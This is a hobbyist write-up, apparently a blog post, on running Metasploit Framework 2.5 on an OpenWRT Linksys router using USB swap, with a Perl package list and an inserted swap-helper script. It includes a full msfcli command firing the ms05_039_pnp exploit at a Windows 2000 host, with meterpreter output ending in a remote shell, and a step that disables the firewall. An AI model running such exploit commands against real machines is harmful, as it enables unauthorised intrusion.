OpenWRT vs Metasploit

Getting Metasploit to run on a Linksys Router

Mati Aharoni - muts (-@-) offensive-security.com
http://www.offensive-security.com

[+] The Story
I recently got a WRTSL54GS - one of the sexier models Linksys has to offer, with a USB connector. Being the inquisitive, gung-ho persona that I am, I decided to muck around with it and see what interesting features it has to offer. I read some very interesting OpenWRT howtos, such as connecting a cellular phone to the router and dialing out via GPRS. I also found an interesting firmware customisation at http://www.hackerpimps.com/ - a "backtrack" equivalent for the wrt54gs. Several precompiled exploits come with that firmware - which got me thinking... My goal was to get Metasploit Framework 2.5 running on the Linksys router. And so the journey began...

[+] The Problems
I started by installing all the perl modules required for the framework, just to be greeted with a nasty +++ killed by SIGKILL +++.
root@OpenWrt:~/framework-2.5# ./msfcli
Killed
Every time I tried running ./msfcli, dmesg showed:
__alloc_pages: 0-order allocation failed (gfp=0x1d2/0)
__alloc_pages: 0-order allocation failed (gfp=0xf0/0)
VM: killing process ./msfcli
[+] The Solutions
I was told by some nice people in #openwrt that this is due to RAM limitations. One way of overcoming this is to set up swap space for OpenWrt, which is where the USB connector comes in. By following the UsbStorageHowto (http://wiki.openwrt.org/UsbStorageHowto) I managed to get the USB disk-on-key (2 GB) recognised, and created swap space on it.

[+] The PwN
A few packages later, msfcli actually responded, and produced a shell on an unpatched win2k machine.
root@OpenWrt:~/framework-2.5# ./msfcli ms05_039_pnp RHOST=192.168.1.196 \
> PAYLOAD=win32_bind_meterpreter TARGET=0 E
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.1.1:1103 <-> 192.168.1.196:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>

[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Process
loadlib: Loading library from 'ext436067.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 456.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1. 

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
   
To my surprise, msfweb also worked, with a little tweaking of the listening interface:
# Configuration defaults...
my %config      =
(
        'BindAddr'      => '192.168.1.1',   # changed from '127.0.0.1'
        'BindPort'      => 55555,
        'LogFile'       => '-',

root@OpenWrt:~/framework-2.5# ./msfweb
+----=[ Metasploit Framework Web Interface (192.168.1.1:55555)
  
[+] The CookBook
The following is my setup for this whole thing to work. I am not an OpenWRT expert, nor a Linux expert. There may be some redundant or otherwise useless steps here. Any comments are welcome.
* I started by disabling iptables (danger!):
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F
  
* I added the backports repository to ipkg.conf:
* Then, I followed the USB Storage howto, to get the USB stick recognised:
* Installed several packages needed for disk management:
ipkg install swap-utils
ipkg install fdisk

* Repartitioned the USB stick, and made a swap Filesystem:
mkswap /dev/scsi/host0/bus0/target0/lun0/disc
swapon /dev/scsi/host0/bus0/target0/lun0/disc
* Downloaded Metasploit Framework:
* Downloaded and installed the required perl packages:
libgcc_3.4.4-8_mipsel.ipk
perl_5.8.7-1_mipsel.ipk
perlbase-autoloader_5.8.7-1_mipsel.ipk
perlbase-base_5.8.7-1_mipsel.ipk
perlbase-byteloader_5.8.7-1_mipsel.ipk
perlbase-bytes_5.8.7-1_mipsel.ipk
perlbase-charnames_5.8.7-1_mipsel.ipk
perlbase-class_5.8.7-1_mipsel.ipk
perlbase-config_5.8.7-1_mipsel.ipk
perlbase-cwd_5.8.7-1_mipsel.ipk
perlbase-data_5.8.7-1_mipsel.ipk
perlbase-digest_5.8.7-1_mipsel.ipk
perlbase-dynaloader_5.8.7-1_mipsel.ipk
perlbase-errno_5.8.7-1_mipsel.ipk
perlbase-essential_5.8.7-1_mipsel.ipk
perlbase-extutils_5.8.7-1_mipsel.ipk
perlbase-findbin_5.8.7-1_mipsel.ipk
perlbase-getcwd_5.8.7-1_mipsel.ipk
perlbase-hostname_5.8.7-1_mipsel.ipk
perlbase-i18n_5.8.7-1_mipsel.ipk
perlbase-ipc_5.8.7-1_mipsel.ipk
perlbase-posix_5.8.7-1_mipsel.ipk
perlbase-socket_5.8.7-1_mipsel.ipk
perlbase-sys_5.8.7-1_mipsel.ipk
perlbase-utf8_5.8.7-1_mipsel.ipk
perlbase-xsloader_5.8.7-1_mipsel.ipk
perlbase-file_5.8.7-1_mipsel.ipk
perlbase-io_5.8.7-1_mipsel.ipk
perlbase-symbol_5.8.7-1_mipsel.ipk
perlbase-selectsaver_5.8.7-1_mipsel.ipk
perlbase-getopt_5.8.7-1_mipsel.ipk
perlbase-integer_5.8.7-1_mipsel.ipk
A final reboot was performed to get all the kernel modules in place, although this was not strictly necessary; insmod would have worked just fine.
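The swap step of the cookbook, as an added POSIX sh helper that is not part of the original write-up: it sums free memory and swap from a /proc/meminfo-format file (the figure that was too small for msfcli), and refuses to run mkswap on a device that /proc/swaps already lists as active, since mkswap overwrites the device. The file paths are parameters so it can be exercised against constructed sample files; the sample contents and the DRY_RUN variable are assumptions made here.

```shell
#!/bin/sh
# Added helper for the swap step (not from the original write-up).
# Paths are parameters so the functions can run against constructed
# copies of /proc/meminfo and /proc/swaps instead of the live files.

# Sum MemFree and SwapFree (kB) from a /proc/meminfo-format file: the
# figure that was too small for msfcli before swap was added.
free_kb() {
    awk '/^(MemFree|SwapFree):/ { total += $2 } END { print total + 0 }' "$1"
}

# Exit 0 if device $1 is already listed in the /proc/swaps-format file $2.
swap_active() {
    awk -v dev="$1" 'NR > 1 && $1 == dev { found = 1 } END { exit !found }' "$2"
}

# Activate swap on $1 unless $2 (default /proc/swaps) already lists it;
# mkswap overwrites the device, so running it twice is never wanted.
# DRY_RUN=1 (an assumed convention) prints the commands instead.
ensure_swap() {
    dev="$1"; swaps="${2:-/proc/swaps}"
    if swap_active "$dev" "$swaps"; then
        echo "swap already active on $dev; skipping mkswap" >&2
        return 0
    fi
    if [ "${DRY_RUN:-0}" = 1 ]; then
        echo "mkswap $dev && swapon $dev"
        return 0
    fi
    mkswap "$dev" && swapon "$dev"
}

# Constructed sample files (values are made up for the demonstration).
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/meminfo" <<'EOF'
MemTotal:        30420 kB
MemFree:          1204 kB
SwapTotal:           0 kB
SwapFree:            0 kB
EOF
printf 'Filename\tType\tSize\tUsed\tPriority\n' > "$SAMPLE_DIR/swaps.none"
{ cat "$SAMPLE_DIR/swaps.none"
  printf '%s\tpartition\t2097144\t0\t-1\n' /dev/scsi/host0/bus0/target0/lun0/disc
} > "$SAMPLE_DIR/swaps.active"

USB=/dev/scsi/host0/bus0/target0/lun0/disc
echo "free memory plus swap: $(free_kb "$SAMPLE_DIR/meminfo") kB"
DRY_RUN=1 ensure_swap "$USB" "$SAMPLE_DIR/swaps.none"   # prints the commands
ensure_swap "$USB" "$SAMPLE_DIR/swaps.active"           # skips: already active
```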

[+] Notes:
Everything seems to be working fine, as far as I tested. Msfcli is a bit slow to respond, and, as can be expected, Msfweb is even slower... but it WORKS!